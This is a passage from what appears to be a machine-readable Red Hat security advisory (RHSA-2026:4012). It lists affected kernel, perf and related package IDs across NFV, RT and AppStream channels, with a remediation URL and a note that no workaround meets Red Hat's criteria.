"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
